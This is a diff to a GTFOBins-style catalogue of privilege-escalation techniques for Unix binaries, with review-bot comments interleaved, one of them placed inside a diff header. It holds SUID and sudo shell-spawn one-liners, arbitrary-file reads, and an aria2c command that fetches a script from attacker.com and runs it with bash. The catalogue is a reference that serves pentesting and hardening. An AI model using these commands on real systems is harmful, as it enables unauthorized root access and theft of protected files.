diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md
index d9fc451..5793b81 100644
--- a/_gtfobins/aria2c.md
+++ b/_gtfobins/aria2c.md
@@ -10,13 +10,6 @@ functions:
 aria2c --on-download-error=$TF http://x
 - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
 code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
- suid:
- - code: |
- COMMAND='id'
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- ./aria2c --on-download-error=$TF http://x
 sudo:
 - code: |
 COMMAND='id'
@@ -24,4 +17,11 @@ functions:
 echo "$COMMAND" > $TF
 chmod +x $TF
 sudo aria2c --on-download-error=$TF http://x
+ limited-suid:
+ - code: |
+ COMMAND='id'
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ ./aria2c --on-download-error=$TF http://x
 ---
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index a131e09..aed6432 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -27,6 +27,10 @@ functions:
 - code: |
 LFILE=file_to_read
 awk '//' "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./awk '//' "$LFILE"
 sudo:
 - code: sudo awk 'BEGIN {system("/bin/sh")}'
 limited-suid:
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index 29735e9..b933fa2 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -17,6 +17,11 @@ functions:
 ed file_to_read
 ,p
 q
+ suid:
+ - code: |
+ ./ed file_to_read
+ ,p
+ q
 sudo:
 - code: |
 sudo ed
diff --git a/_gtfobins/gawk.md b/_gtfobins/gawk.md
index bf63ca8..dc398a6 100644
--- a/_gtfobins/gawk.md
+++ b/_gtfobins/gawk.md
@@ -27,6 +27,10 @@ functions:
 - code: |
 LFILE=file_to_read
 gawk '//' "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./gawk '//' "$LFILE"
 sudo:
 - code: sudo gawk 'BEGIN {system("/bin/sh")}'
 limited-suid:
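Review bot: The new `limited-suid` block in the second aria2c hunk is a verbatim copy of the deleted `suid` block and carries no `description:`, so a reader cannot tell why the same commands were demoted from a full SUID primitive to a limited one. If the reason is that aria2c hands the `--on-download-error` hook to a shell that resets the effective uid (confirm against how aria2c actually executes the hook), say so in one line, e.g. `description: The hook command runs with the caller's privileges unless it re-escalates itself, because it is executed through a shell that drops the effective UID.`, and keep `COMMAND='id'` so the output makes that visible. The script written to `$TF` has no `#!` line, which is consistent with the hook going through a shell rather than a direct execve, but that is inferred, not shown here.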
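Review bot: The new suid entries in awk, gawk, mawk and nawk pass the path as an awk operand, which is the right shape: the SUID awk opens the file with its effective uid, whereas `./awk '//' < "$LFILE"` would have the caller's shell open the file and lose the privilege. Two operand quirks deserve a one-line caveat: awk treats an operand of the form `name=value` as a variable assignment rather than a file, and a path beginning with `-` is parsed as an option, so such names need a `./` or absolute prefix. A `description:` on the suid block such as `The file is opened by awk itself; do not replace the operand with a shell redirection, which would open it as the unprivileged caller.` would capture both points.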
diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md
index cd50714..f66954f 100644
--- a/_gtfobins/hping3.md
+++ b/_gtfobins/hping3.md
@@ -7,7 +7,7 @@ functions:
 suid:
 - code: |
 ./hping3
- /bin/sh
+ /bin/sh -p
 sudo:
 - code: |
 sudo hping3
diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md
index 6686bf5..0e634cc 100644
--- a/_gtfobins/lua.md
+++ b/_gtfobins/lua.md
@@ -59,6 +59,8 @@ functions:
 - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
 file-read:
 - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
+ suid:
+ - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
 sudo:
 - code: sudo lua -e 'os.execute("/bin/sh")'
 limited-suid:
diff --git a/_gtfobins/lwp-request.md b/_gtfobins/lwp-request.md
index aaa7476..baf0a4b 100644
--- a/_gtfobins/lwp-request.md
+++ b/_gtfobins/lwp-request.md
@@ -4,12 +4,12 @@ functions:
 - code: |
 LFILE=file_to_read
 lwp-request "file://$LFILE"
- suid:
- - code: |
- LFILE=file_to_read
- ./lwp-request "file://$LFILE"
 sudo:
 - code: |
 LFILE=file_to_read
 sudo lwp-request "file://$LFILE"
+ limited-suid:
+ - code: |
+ LFILE=file_to_read
+ ./lwp-request "file://$LFILE"
 ---
diff --git a/_gtfobins/mawk.md b/_gtfobins/mawk.md
index fcaf868..0ff4b49 100644
--- a/_gtfobins/mawk.md
+++ b/_gtfobins/mawk.md
@@ -10,6 +10,10 @@ functions:
 - code: |
 LFILE=file_to_read
 mawk '//' "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./mawk '//' "$LFILE"
 sudo:
 - code: sudo mawk 'BEGIN {system("/bin/sh")}'
 limited-suid:
diff --git a/_gtfobins/nawk.md b/_gtfobins/nawk.md
index 9dc77fa..8663a76 100644
--- a/_gtfobins/nawk.md
+++ b/_gtfobins/nawk.md
@@ -27,6 +27,10 @@ functions:
 - code: |
 LFILE=file_to_read
 nawk '//' "$LFILE"
+ suid:
+ - code: |
+ LFILE=file_to_read
+ ./nawk '//' "$LFILE"
 sudo:
 - code: sudo nawk 'BEGIN {system("/bin/sh")}'
 limited-suid:
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
index ba93dde..6a76161 100644
--- a/_gtfobins/nmap.md
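Review bot: The added lua `suid` entry runs `lua` from `$PATH` rather than the SUID copy, unlike every other suid entry in this diff (`./awk`, `./ed`, `./hping3`, `./nohup`), so as written it opens the file with the caller's own uid and does not demonstrate a SUID primitive at all. The line should read `- code: ./lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'`. No `-p`-style flag is involved here because the open happens inside the lua process itself, so invoking the right binary is the whole fix.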
+++ b/_gtfobins/nmap.md
@@ -85,7 +85,7 @@ functions:
 file-write:
 - code: |
 TF=$(mktemp)
- echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
+ echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
 nmap --script=$TF
 - description: The payload appears inside the regular nmap output.
 code: |
@@ -94,7 +94,7 @@ functions:
 file-read:
 - code: |
 TF=$(mktemp)
- echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
+ echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
 nmap --script=$TF
 sudo:
 - description: Input echo is disabled.
diff --git a/_gtfobins/nohup.md b/_gtfobins/nohup.md
index 6c75a80..cc1a8cb 100644
--- a/_gtfobins/nohup.md
+++ b/_gtfobins/nohup.md
@@ -7,8 +7,8 @@ functions:
 COMMAND='/usr/bin/id'
 nohup "$COMMAND"
 cat nohup.out
+ suid:
+ - code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
 sudo:
 - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
- suid:
- - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
 ---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index 12daa5b..95b0719 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -14,6 +14,14 @@ functions:
 .import $LFILE t
 SELECT * FROM t;
 EOF
+ suid:
+ - code: |
+ LFILE=file_to_read
+ sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
 sudo:
 - code: sudo sqlite3 /dev/null '.shell /bin/sh'
 limited-suid:
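Review bot: The new nohup suid entry depends on `$(tty)` expanding to a device path three times, so it silently breaks in a session without a controlling terminal (a bare reverse shell, a cron or CI context): `tty` then prints `not a tty` and exits non-zero, the redirections become `<not a tty`, and the inner `sh -p` fails or reads from the wrong place. A one-line caveat would spare the reader a confusing failure, e.g. a description saying that the entry requires an interactive terminal because nohup points the child's stdio at nohup.out and the tty redirections re-attach the spawned shell to the caller's TTY. The context lines above (`nohup "$COMMAND"` / `cat nohup.out`) already show the nohup.out behaviour those redirections work around.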
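Review bot: The new sqlite3 `suid` block invokes `sqlite3` by name instead of `./sqlite3`, so it runs whatever sqlite3 is first in `$PATH` under the caller's uid rather than the SUID copy, unlike the `./awk`, `./ed` and `./nohup` suid entries in this diff; the line should read `./sqlite3 << EOF`. Since the hunk also carries the `.import` approach into a privileged-read context, it is worth a `description:` noting that `.import` splits each line on the shell's current separator (`|` in the default list mode), so a line containing that character is truncated or rejected depending on the sqlite3 version and the output is not a byte-exact copy of the file.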